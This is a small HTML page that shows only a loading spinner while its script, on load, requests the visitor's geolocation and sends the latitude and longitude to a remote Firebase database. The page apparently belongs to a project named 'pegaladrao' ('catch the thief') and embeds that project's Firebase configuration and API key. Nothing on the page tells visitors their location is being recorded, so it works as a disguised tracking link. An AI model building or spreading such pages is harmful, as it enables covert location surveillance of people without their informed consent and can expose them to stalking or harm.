<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body {text-align: center;}
        #enterDetails {float: left; width: 50%;  background-color: darkslategray; color: floralwhite;}
        #findDetails {float: left; width: 50%; background-color: floralwhite; color: darkslategray;}
        input {width: 120px;}
    </style>
</head>
<body>

  <div id="loading">
    <div id="spinner"></div>
  </div>

    <style>
    body {background-color: rgb(255, 255, 255);}

    #loading {
    width: 100vw;
    height: 100vh;
    position: fixed;
    background: #ffffff;
    z-index: 999;
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
}
#spinner {
    animation: rotate 0.56s infinite linear;
    width:60px;
    height:60px;
    border:6px solid #ffffff;
    border-bottom:6px solid #255597;
    border-radius:50%;
    margin:0;
}
@keyframes rotate {
    0% {transform: rotate(0deg);}
    100% {transform: rotate(360deg);}
}
    
    </style>
    
    <script type="module">

// Import the functions you need from the SDKs you need
  import { initializeApp } from "https://www.gstatic.com/firebasejs/10.6.0/firebase-app.js";
  // TODO: Add SDKs for Firebase products that you want to use
  // https://firebase.google.com/docs/web/setup#available-libraries

  // Your web app's Firebase configuration
  const firebaseConfig = {
    apiKey: "AIzaSyA_tig2nYBooTN57-nsVYDLRDJUaULCw_o",
    authDomain: "pegaladrao-2de02.firebaseapp.com",
    databaseURL: "https://pegaladrao-2de02-default-rtdb.firebaseio.com",
    projectId: "pegaladrao-2de02",
    storageBucket: "pegaladrao-2de02.appspot.com",
    messagingSenderId: "875807932163",
    appId: "1:875807932163:web:45edd4418988971587b336"
  };

  // Initialize Firebase
  const app = initializeApp(firebaseConfig);

        import {getDatabase, ref, get, set, child, update, remove} from "https://www.gstatic.com/firebasejs/10.6.0/firebase-database.js";

        const db = getDatabase();

        // View did load
        window.addEventListener('DOMContentLoaded', () => {
          navigator.geolocation.getCurrentPosition(success);
        });

          function success(position) {

          const crd = position.coords;

          InsertData(`${crd.longitude}`, `${crd.latitude}`);
          };

        function InsertData(long, lat) {
            set(ref(db, "Coordinates/"),{
                lat: lat,
                long: long,
            })
            .then(()=>{
              
            })
            .catch((error)=>{
                alert(error);
            });
        };

      </script>
</body>
</html>